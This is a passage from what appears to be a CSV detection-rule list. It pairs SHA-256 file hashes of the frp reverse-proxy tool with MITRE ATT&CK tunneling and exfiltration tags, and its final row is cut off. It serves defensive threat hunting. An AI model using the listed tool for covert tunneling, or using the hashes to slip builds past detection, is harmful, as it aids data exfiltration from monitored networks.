"*4af6b42eb79a5290d1e24e534a0ec34521dc2d30ef60898abd092ddb2e1cd55c*",".{0,1000}4af6b42eb79a5290d1e24e534a0ec34521dc2d30ef60898abd092ddb2e1cd55c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4c12c1e287a1fcf28bb7a542fc5c355c42bd8e65db20f7a8b77d58edae502af4*",".{0,1000}4c12c1e287a1fcf28bb7a542fc5c355c42bd8e65db20f7a8b77d58edae502af4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4c3e156680341f87566f7534124d9fc6ef687a86873eee9f8214049cb5588242*",".{0,1000}4c3e156680341f87566f7534124d9fc6ef687a86873eee9f8214049cb5588242.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4c4685aec2af6e71912d9d29a9692e0ac6bbb1926f17e6b6ed680cf4e9ad8e5d*",".{0,1000}4c4685aec2af6e71912d9d29a9692e0ac6bbb1926f17e6b6ed680cf4e9ad8e5d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*4c90633d523f467384a424bbfce211f737becbc7c4ac637e10e6c91fda8a6a26*",".{0,1000}4c90633d523f467384a424bbfce211f737becbc7c4ac637e10e6c91fda8a6a26.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4cafe6451efd64e50a28f2533055b1f68fc59426838214d20341acba515b0eb5*",".{0,1000}4cafe6451efd64e50a28f2533055b1f68fc59426838214d20341acba515b0eb5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4cdca1cc3d298a5e6628ec40e174882e26039d953492eaef6c0d25cef065ace5*",".{0,1000}4cdca1cc3d298a5e6628ec40e174882e26039d953492eaef6c0d25cef065ace5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4ce2100f0e9907d9dc152f94f56bf33bc44d029b2f83efde32b586a57bf55809*",".{0,1000}4ce2100f0e9907d9dc152f94f56bf33bc44d029b2f83efde32b586a57bf55809.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*4d13675c330ca07d532f7a2ebc72fdc011487fe318f2ee645842a3fa4b23c966*",".{0,1000}4d13675c330ca07d532f7a2ebc72fdc011487fe318f2ee645842a3fa4b23c966.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4e155fcf4f0c7e186ccd2be94a2e036bb62790c9bc00d9145a2999b5e3f38717*",".{0,1000}4e155fcf4f0c7e186ccd2be94a2e036bb62790c9bc00d9145a2999b5e3f38717.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4e2b06bd978472dd092c166b43ec56ab22c1347710fd77616283d2c27ee9ae56*",".{0,1000}4e2b06bd978472dd092c166b43ec56ab22c1347710fd77616283d2c27ee9ae56.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4eecced7aa167279bda23afe2be0f3dd9b61080531fdbae5137bd257c334992a*",".{0,1000}4eecced7aa167279bda23afe2be0f3dd9b61080531fdbae5137bd257c334992a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*4ef082c1788e972f016f00286a2054c82189cec3a1a3e2af8123240c2888b6ff*",".{0,1000}4ef082c1788e972f016f00286a2054c82189cec3a1a3e2af8123240c2888b6ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4f2088aff3460c9bd278121de7781985734969399d408f0c9e3f794165e0a407*",".{0,1000}4f2088aff3460c9bd278121de7781985734969399d408f0c9e3f794165e0a407.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4faed559dc80bc2bf43b6c3da60e19f86c42ab8ed2b19e3ff0d3f4e4cca6c50c*",".{0,1000}4faed559dc80bc2bf43b6c3da60e19f86c42ab8ed2b19e3ff0d3f4e4cca6c50c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5099b8acb17c0681301d82362c9c37bb9a579bf0580ab7362ab7cae2b7bb5f68*",".{0,1000}5099b8acb17c0681301d82362c9c37bb9a579bf0580ab7362ab7cae2b7bb5f68.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*50addce2b6170aae470a9d692f444825991e3c1b6208d141c17ae5909c6c2cc9*",".{0,1000}50addce2b6170aae470a9d692f444825991e3c1b6208d141c17ae5909c6c2cc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*52fabafac257ef8ca28e53cc4f210789cfd882946d0f9d2f9457d63f0344a602*",".{0,1000}52fabafac257ef8ca28e53cc4f210789cfd882946d0f9d2f9457d63f0344a602.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*531be6e910202087c61e10e57e28eee9a079fee380b8a42432de55d570bb25cb*",".{0,1000}531be6e910202087c61e10e57e28eee9a079fee380b8a42432de55d570bb25cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*53242fd2bad1e6b3039fdef38df6219710864d1c9e639208a2106326921d15fd*",".{0,1000}53242fd2bad1e6b3039fdef38df6219710864d1c9e639208a2106326921d15fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*54e364bf382cc987a962fa5db328ce8bc375bff74ff7b8afcaeb1905a295e027*",".{0,1000}54e364bf382cc987a962fa5db328ce8bc375bff74ff7b8afcaeb1905a295e027.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*550e7d04aa4d00fb81b1cd566c58b056a3da8bcfd05631e5f4edd673232b9062*",".{0,1000}550e7d04aa4d00fb81b1cd566c58b056a3da8bcfd05631e5f4edd673232b9062.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*572872fec378f423b141faa205b44faa07bbf06f7272b0a6a3235c7992a69998*",".{0,1000}572872fec378f423b141faa205b44faa07bbf06f7272b0a6a3235c7992a69998.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5953e84b6a1590568b6d77a0b75093552577aa61484aff41b3ad0fb35c68719f*",".{0,1000}5953e84b6a1590568b6d77a0b75093552577aa61484aff41b3ad0fb35c68719f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*59b2d72c684e869bb6d4a5d37bb1c165c0c4432f20a6f4204ae6e7de1e632587*",".{0,1000}59b2d72c684e869bb6d4a5d37bb1c165c0c4432f20a6f4204ae6e7de1e632587.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5ad396bc221aefa47d1192d6df11193240891ea3a88d0f0b941e1cb2967e2a01*",".{0,1000}5ad396bc221aefa47d1192d6df11193240891ea3a88d0f0b941e1cb2967e2a01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5b4204056ae94aa8281218656a1b3566eaaea2ddf4874eccb4a9c23cf9bc0fd0*",".{0,1000}5b4204056ae94aa8281218656a1b3566eaaea2ddf4874eccb4a9c23cf9bc0fd0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5b7c15f9e14042a99c38515ddfa694f188f59d72bde10ce341d86cbf7f801b19*",".{0,1000}5b7c15f9e14042a99c38515ddfa694f188f59d72bde10ce341d86cbf7f801b19.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*5b8d4fddcbe0c9e1e82bf8ca30b97bde3fff668741e49a260d6c13c55584bbc9*",".{0,1000}5b8d4fddcbe0c9e1e82bf8ca30b97bde3fff668741e49a260d6c13c55584bbc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5c4828f6e89b6f2479b671d3e7644b34b6968a6017cac402144c844b48dcc621*",".{0,1000}5c4828f6e89b6f2479b671d3e7644b34b6968a6017cac402144c844b48dcc621.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5dbe659f612640086d3a7dc05b397f4e444c92d784951c49bfe4020b934cb559*",".{0,1000}5dbe659f612640086d3a7dc05b397f4e444c92d784951c49bfe4020b934cb559.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5de51fda0577a049945e42f386df70a8e9eb2769af96bb6b7471cb5072605be0*",".{0,1000}5de51fda0577a049945e42f386df70a8e9eb2769af96bb6b7471cb5072605be0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*5e041b19ba9ca6a5255679b353099946065edfdf951d807db2587fa8c95b1447*",".{0,1000}5e041b19ba9ca6a5255679b353099946065edfdf951d807db2587fa8c95b1447.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5eb942ba9ed0d45d2ac1ea6ed02fbff802a69c408c8eb68155dd2fb7c6fabb0e*",".{0,1000}5eb942ba9ed0d45d2ac1ea6ed02fbff802a69c408c8eb68155dd2fb7c6fabb0e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5f1660b704a8b580082b81e14a41d2da9ff1edeebc59b885acb92f1ab1f46838*",".{0,1000}5f1660b704a8b580082b81e14a41d2da9ff1edeebc59b885acb92f1ab1f46838.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5f3f60a71fa040a36be5de818e6f95c48e8a2ba368b700a079b593f0e281dbd8*",".{0,1000}5f3f60a71fa040a36be5de818e6f95c48e8a2ba368b700a079b593f0e281dbd8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*5f7c9ad77e37a5921450c013b9792dac4ea5ef5d3114ea9276585f62e2318a79*",".{0,1000}5f7c9ad77e37a5921450c013b9792dac4ea5ef5d3114ea9276585f62e2318a79.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5fc4a7caff50594c717e7d8e5929d4cb3e1674d81fd345a29abadce0a86d22f3*",".{0,1000}5fc4a7caff50594c717e7d8e5929d4cb3e1674d81fd345a29abadce0a86d22f3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*5feca5a4d601ed393a3cc04d8bf3c41194ef56af155c326cf1e7fdfd130ef17a*",".{0,1000}5feca5a4d601ed393a3cc04d8bf3c41194ef56af155c326cf1e7fdfd130ef17a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*60ee29ebb3683135c815b4e9b6681c92a445ac3f40e9302a70b65fca68ff5116*",".{0,1000}60ee29ebb3683135c815b4e9b6681c92a445ac3f40e9302a70b65fca68ff5116.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*618b1a0d2bfebc9bc3e59b4c39e67082a445e5aeaaaa0fec9eded436dd64a2d4*",".{0,1000}618b1a0d2bfebc9bc3e59b4c39e67082a445e5aeaaaa0fec9eded436dd64a2d4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*61b4d21b669ceb671b298a4ed4aa3c70b33d6e3e4281f7417336a76f684424ca*",".{0,1000}61b4d21b669ceb671b298a4ed4aa3c70b33d6e3e4281f7417336a76f684424ca.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*62044b03a7bccb7e8f8f4f691f34838cd1160a643c0bb06ca8489e78d2d65897*",".{0,1000}62044b03a7bccb7e8f8f4f691f34838cd1160a643c0bb06ca8489e78d2d65897.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*62170484c4d450fa47d86ed8b1dd20659b22cd7bc5a36caab330f244d6ea4d97*",".{0,1000}62170484c4d450fa47d86ed8b1dd20659b22cd7bc5a36caab330f244d6ea4d97.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*629d2edde798217cc664abb52610531e8bfd089b54879139c66a148429897e11*",".{0,1000}629d2edde798217cc664abb52610531e8bfd089b54879139c66a148429897e11.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*63035108f37cc80d6043c1fcac50f8e856791a4fb8bcef0e792d97c88d8e35c5*",".{0,1000}63035108f37cc80d6043c1fcac50f8e856791a4fb8bcef0e792d97c88d8e35c5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6387e119ac3d0e3ec269a4f6569372a57f78b0545d5af71a70c42e546b2d6dc0*",".{0,1000}6387e119ac3d0e3ec269a4f6569372a57f78b0545d5af71a70c42e546b2d6dc0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*662d62af7744b9b639b3473bbdd2c4c70dfa5ac5fe1d058d13ce3cc7ea059500*",".{0,1000}662d62af7744b9b639b3473bbdd2c4c70dfa5ac5fe1d058d13ce3cc7ea059500.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*6681551b9bb7311625be8f3a269c183b600e13966787a8b11a8f9e8595a3d66b*",".{0,1000}6681551b9bb7311625be8f3a269c183b600e13966787a8b11a8f9e8595a3d66b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*69c08bae93e16aaf57debbe2b10df6824f5dfef32ce21b5d57d750b0698999ee*",".{0,1000}69c08bae93e16aaf57debbe2b10df6824f5dfef32ce21b5d57d750b0698999ee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6a3e20b001ab57b066a52394ba2d992ae6d93b22260b0969307966fad6214692*",".{0,1000}6a3e20b001ab57b066a52394ba2d992ae6d93b22260b0969307966fad6214692.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6abdb7353ae5562e16d28e1da142f5f97bd51964359901aafd694b4638f85739*",".{0,1000}6abdb7353ae5562e16d28e1da142f5f97bd51964359901aafd694b4638f85739.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*6add94e2916fd776bc2fd62a01fa6fd282f040e2f05ba42962e823eac821ae81*",".{0,1000}6add94e2916fd776bc2fd62a01fa6fd282f040e2f05ba42962e823eac821ae81.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6bef9db4560b6c7da2def271f7bc5bf6988fafa3e654f8a2bfb589fd7d79b2db*",".{0,1000}6bef9db4560b6c7da2def271f7bc5bf6988fafa3e654f8a2bfb589fd7d79b2db.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6c9628cb8382894dc0a928df8fcea9dad9cb763ff161e31f94f816443c7419e0*",".{0,1000}6c9628cb8382894dc0a928df8fcea9dad9cb763ff161e31f94f816443c7419e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*6fe6b708ab65d61293fb7f1669a3dceab6d8a7d06f9f9b93db68025873f51c44*",".{0,1000}6fe6b708ab65d61293fb7f1669a3dceab6d8a7d06f9f9b93db68025873f51c44.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*70f57deb3ce57eb890104fe14d6fe442a815e095122a9c2b584e34d3c54f5563*",".{0,1000}70f57deb3ce57eb890104fe14d6fe442a815e095122a9c2b584e34d3c54f5563.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7174a1328325da89ed6aabcf522131db9928222154e9607b0d5a2f7b2977ae93*",".{0,1000}7174a1328325da89ed6aabcf522131db9928222154e9607b0d5a2f7b2977ae93.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data 